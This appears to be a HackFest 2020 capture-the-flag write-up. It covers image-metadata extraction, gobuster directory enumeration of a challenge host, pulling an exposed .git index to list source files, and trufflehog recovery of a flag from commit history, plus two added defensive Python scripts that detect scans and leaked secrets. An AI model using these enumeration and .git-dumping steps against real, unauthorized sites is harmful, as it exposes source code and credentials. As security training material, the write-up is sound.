HackFest 2020

Incredibly Savage Book Nerd

This comic book was mint before this…

exiftool ruined_isbn.jpg
ExifTool Version Number         : 12.09
File Name                       : ruined_isbn.jpg
Directory                       : .
File Size                       : 515 kB
...
Text Layer Name                 : ISBN: 1-200-26505-X ISBN13: 978-1-200-26505-5
Text Layer Text                 : ISBN: 1-200-26505-X ISBN13: 978-1-200-26505-5
...
Thumbnail Image                 : (Binary data 4344 bytes, use -b option to extract)

HF-1-200-26505-X978-1-200-26505-5

My favorite book list is RUINED (125)

Flag not found

The Twelve Labours of Web Coding (dax & Brainmoustache)

VASE #1

URL="https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
===============================================================
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/.htaccess (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/.htpasswd (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/.hta (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/css (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/fonts (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/img (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/index.html (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/js (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/robots.txt (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/server-status (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/static (Status: 301)

https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/robots.txt

User-agent: *
Disallow: /dev/

URL="https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev"
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
===============================================================
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.hta (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.htpasswd (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.htaccess (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/HEAD (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/server-status (Status: 200)

https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/HEAD

ref: refs/heads/master

https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/refs/heads/master

1acc7db4b782b225f149bcfafdbd390cecbdfe53

https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/logs/HEAD

0000000000000000000000000000000000000000 1acc7db4b782b225f149bcfafdbd390cecbdfe53 daxAKAhackerman <dax@hackerman.ca> 1605454550 +0000	commit (initial): Initial commit

URL="https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git"
gobuster dir -k -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
===============================================================
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/.hta (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/.htaccess (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/.htpasswd (Status: 403)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/config (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/hooks (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/index (Status: 200)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/info (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/logs (Status: 301)
https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/objects (Status: 301)

# Clone any git repository
git clone https://github.com/daxAKAhackerman/test-project.git
cd ./test-project/.git

# Download the index file & config
wget https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/index
wget https://03ca31fb-2981-4b2a-b9de-370b9ce86c2f.webcoding.hfctf.org/dev/.git/config

# Show config file contents
cat config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true

# Replace the git repo's index file with the downloaded one
# List files
git ls-files -s
100644 c89b47928f70bb9fad44144f4d38b752c196f789 0	app/app.go
100644 46c86a74494115cd0e9f1b86f2753f4cf7883f1c 0	app/go.mod
100644 6a7bdfde09da5ee98351ab0d92ab544800235d17 0	app/go.sum
100644 009dc919d5fbc3ea1c146b9a8c02ff0e360bb87f 0	app/handlers/cookie.go
100644 d1dbf279c70f32c33c6eb9384e596dc41b12fbf3 0	app/handlers/crud.go
100644 3f89659fbb008f9b94b4baecc78fba902ab25087 0	app/handlers/flags.go
100644 3e006c02ca33d5b443bac00ecddb9966ebdc5649 0	app/handlers/go.mod
100644 e375ca20d2715dc2af823d739eec08239c921f29 0	app/handlers/go.sum
100644 271c52684e812e7d1b55a3590c9d0b3c59d71483 0	app/models/go.mod
100644 4e8d56970132ea5944672607141dfb8b06a6574a 0	app/models/go.sum
100644 5147176a7af451464ea3b21b4f8da3dd551ebe81 0	app/models/models.go
100644 4cd1d0736cb10731a1ee22d80ecbaac822f4c3bf 0	app/utils/go.mod
100644 afe4eb32709ce02bb7611bd36f0cf425a67abb7b 0	app/utils/utils.go
100644 d6903b91b575633f8fec2239727edb8839d516bf 0	flag.txt
100644 b93d7d6ea54702e98f7603eb5eea48ba5a784ce0 0	go.mod
100644 6a7bdfde09da5ee98351ab0d92ab544800235d17 0	go.sum
100644 04af6441318c03159575c585642c2dc2e500f785 0	main.go
100644 b931da1fb9b9e073aa6b67d3ca1ec58c93161cf8 0	wait-for-it.sh

Flag not found
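
From the server side, the enumeration above leaves a clear trail in the access log: a burst of 403/404 responses from one client, followed by 200 responses on paths under .git. The following is an added example, not part of the original write-up; the log lines are constructed, and the thresholds and the analyze() helper are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample in Apache combined log format; addresses are
# documentation-range placeholders, not data from the write-up.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Nov/2020:16:00:01 +0000] "GET /.htaccess HTTP/1.1" 403 199 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:01 +0000] "GET /.htpasswd HTTP/1.1" 403 199 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:01 +0000] "GET /admin HTTP/1.1" 404 196 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:02 +0000] "GET /backup HTTP/1.1" 404 196 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:02 +0000] "GET /dev HTTP/1.1" 403 199 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:02 +0000] "GET /robots.txt HTTP/1.1" 200 33 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:09 +0000] "GET /dev/.git/HEAD HTTP/1.1" 200 23 "-" "-"
198.51.100.7 - - [15/Nov/2020:16:00:12 +0000] "GET /dev/.git/index HTTP/1.1" 200 1746 "-" "-"
203.0.113.20 - - [15/Nov/2020:16:01:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "-"
203.0.113.20 - - [15/Nov/2020:16:01:01 +0000] "GET /img/missing.png HTTP/1.1" 404 196 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
VCS_RE = re.compile(r"/\.(git|svn|hg)(/|$)")  # version-control metadata paths


def analyze(log_text, min_requests=5, error_ratio=0.6):
    """Return (served VCS paths, clients whose traffic looks like a wordlist scan)."""
    total = defaultdict(int)
    errors = defaultdict(int)
    exposed = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, _method, path, status = m.groups()
        total[ip] += 1
        if status in ("403", "404"):
            errors[ip] += 1
        # A 2xx on a VCS path means the server actually handed the file out.
        if status.startswith("2") and VCS_RE.search(path.split("?", 1)[0]):
            exposed.add(path)
    scanners = sorted(ip for ip, n in total.items()
                      if n >= min_requests and errors[ip] / n >= error_ratio)
    return sorted(exposed), scanners


if __name__ == "__main__":
    served, scanners = analyze(SAMPLE_LOG)
    print("VCS metadata served:", served)
    print("Likely enumeration clients:", scanners)
```

Any path in the first list is a server-side finding in its own right: the web server should refuse requests under .git regardless of who asked.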

VASE #2 – Herd the cattle of Geryon

Sensitive information in Git commit history

This application was created to facilitate the testing phase of the application found here: https://github.com/daxAKAhackerman/test-project.

trufflehog "https://github.com/daxAKAhackerman/test-project.git"
-# Use my build script! (I'll make it available eventually)
-# The --unsafe flag can be used to remove the protections that I have placed on the package.json file
-# FLAG-1: HF-tyNjuXASYW4bJQw1cSNZrRQtLKCA34sp
-bash build SRC_FOLDER DST_FOLDER [--unsafe]

HF-tyNjuXASYW4bJQw1cSNZrRQtLKCA34sp
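
The flag was on lines that a later commit deleted, so a scan of the current tree would not see it; the history has to be scanned diff by diff, removed lines included. The following is an added example, not part of the original write-up and not TruffleHog's own code: it applies a Shannon-entropy heuristic to a constructed diff, and the file name, the 20-character minimum and the 4.5-bit threshold are assumptions of this example.

```python
import math
import re

# Constructed unified diff wrapping the removed lines quoted above; the file
# name and hunk header are placeholders, not taken from the repository.
SAMPLE_DIFF = """\
--- a/README.md
+++ b/README.md
@@ -1,5 +1,1 @@
 # test-project
-# Use my build script! (I'll make it available eventually)
-# The --unsafe flag can be used to remove the protections that I have placed on the package.json file
-# FLAG-1: HF-tyNjuXASYW4bJQw1cSNZrRQtLKCA34sp
-bash build SRC_FOLDER DST_FOLDER [--unsafe]
"""

TOKEN_RE = re.compile(r"[A-Za-z0-9+/=]{20,}")  # base64-alphabet runs (assumed minimum length)


def shannon_entropy(token):
    """Bits of entropy per character of the token."""
    counts = {c: token.count(c) for c in set(token)}
    return -sum(n / len(token) * math.log2(n / len(token)) for n in counts.values())


def find_secrets(diff_text, threshold=4.5):
    """Return (sign, token) for high-entropy tokens on added or removed lines."""
    hits = []
    for line in diff_text.splitlines():
        if line.startswith(("--- ", "+++ ")) or line[:1] not in ("+", "-"):
            continue  # file headers, hunk headers and context lines
        for token in TOKEN_RE.findall(line[1:]):
            if shannon_entropy(token) >= threshold:
                hits.append((line[0], token))
    return hits


if __name__ == "__main__":
    for sign, token in find_secrets(SAMPLE_DIFF):
        state = "removed from the tree, still in history" if sign == "-" else "added"
        print(f"{token} ({state})")
```

A hit on a "-" line means the secret is still retrievable from the repository history and should be rotated, not just deleted.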

VASE #3

“Rustacean Web Application” refers to the Rust programming language. The page's source code contains a link:

https://fe8d0f9a-afd2-43c6-a74e-b33bc34ed88d.webcoding.hfctf.org/<REDACTED>/scr1pt_h3r3